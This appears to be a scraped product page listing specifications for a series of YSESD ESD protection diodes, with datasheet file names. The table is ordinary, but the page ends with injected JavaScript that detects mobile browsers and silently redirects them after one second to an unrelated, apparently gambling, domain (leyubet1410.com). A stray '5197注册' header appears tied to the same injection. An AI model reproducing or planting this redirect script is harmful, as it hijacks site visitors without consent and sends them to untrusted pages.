5197注册

  • EN

ESD Protection

Part Number Reverse Stand-off Voltage Reverse Breakdown Voltage Reverse Leakage Current Clamping Voltage Max. Clamping Voltage Peak Pulse Current Off-State Capacitance Peak Pulse Power (8/20uS) ESD Air(kV) ESD Contact(kV) Direction Package download
VRWM(V) VBR(min)(V) IR(uA) VC(V) @ 1A VC(V) @ Ipp Ipp(A) CJ(pF) Ppp(W)
YSESD0801S-12CP 12 13.3 0.5 22 32 2 0.4 64 20 15 Bi DFN1006 YSESD0801S-12CP_REV.03_20200713.pdf
YSESD0801S-15CP 15 16 0.5 25 35 2 0.4 70 20 15 Bi DFN1006 YSESD0801S-15CP_REV.03_20200713.pdf
YSESD11D5V0C 5 5.6 0.5 9.8 12.5 5.5 15 - 15 8 Bi DFN0603 YSESD11D5V0C_REV.02_20200505.pdf
YSESD1201OC 12 13.3 0.2 19 26 5 15 150 25 20 Bi DFN1006 YSESD1201OC_REV.02_20200506.pdf
YSESD3325CP 3.3 4 1 7.6 15 7 25 60 30 30 Bi DFN1006 YSESD3325CP_REV.01_20200728.pdf
YSESD3V3DN02B1LA 3.3 3.8 1 7.6 9 7 13 70 30 30 Bi DFN0603 YSESD3V3DN02B1LA_REV.02_20200505.pdf
YSESD3Z05BT1G 5 6 10 9.8 18 17 200 350 15 8 Bi SOD-323 YSESD3ZxxBT1G_REV.05_20200505.pdf
YSESD3Z05T1G 5 6 10 9.8 16 23 300 350 30 30 Uni SOD-323 YSESD3ZxxT1G_REV.06_20200505.pdf
YSESD3Z08BT1G 8 8.5 1 13.4 24 12 100 350 15 8 Bi SOD-323 YSESD3ZxxBT1G_REV.05_20200505.pdf
YSESD3Z08T1G 8 7.8 10 13.4 21 17 150 350 30 30 Uni SOD-323 YSESD3ZxxT1G_REV.06_20200505.pdf
YSESD3Z12BT1G 12 13.3 1 19 32 11 75 350 15 8 Bi SOD-323 YSESD3ZxxBT1G_REV.05_20200505.pdf
YSESD3Z12T1G 12 13.3 1 19 25 12 130 350 30 30 Uni SOD-323 YSESD3ZxxT1G_REV.06_20200505.pdf
YSESD3Z15BT1G 15 16.7 1 24 38 10 68 350 15 8 Bi SOD-323 YSESD3ZxxBT1G_REV.05_20200505.pdf
YSESD3Z15T1G 15 16.7 1 24 30 10 120 350 30 30 Uni SOD-323 YSESD3ZxxT1G_REV.06_20200505.pdf
YSESD3Z18BT1G 18 20 1 29 45 9 57 350 15 8 Bi SOD-323 YSESD3ZxxBT1G_REV.05_20200505.pdf
YSESD3Z18T1G 18 19 1 28 49 8 100 350 30 30 Uni SOD-323 YSESD3ZxxT1G_REV.06_20200505.pdf
YSESD3Z24BT1G 24 26.7 1 43 52 7 50 350 15 8 Bi SOD-323 YSESD3ZxxBT1G_REV.05_20200505.pdf
YSESD3Z24T1G 24 26.6 1 43 50 6 80 350 15 8 Uni SOD-323 YSESD3ZxxT1G_REV.06_20200505.pdf
YSESD3Z3.3BT1G 3.3 4 40 7 10.5 20 450 350 15 8 Bi SOD-323 YSESD3ZxxBT1G_REV.05_20200505.pdf
YSESD3Z3.3T1G 3 4 200 6.5 13 25 450 350 30 30 Uni SOD-323 YSESD3ZxxT1G_REV.06_20200505.pdf
var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();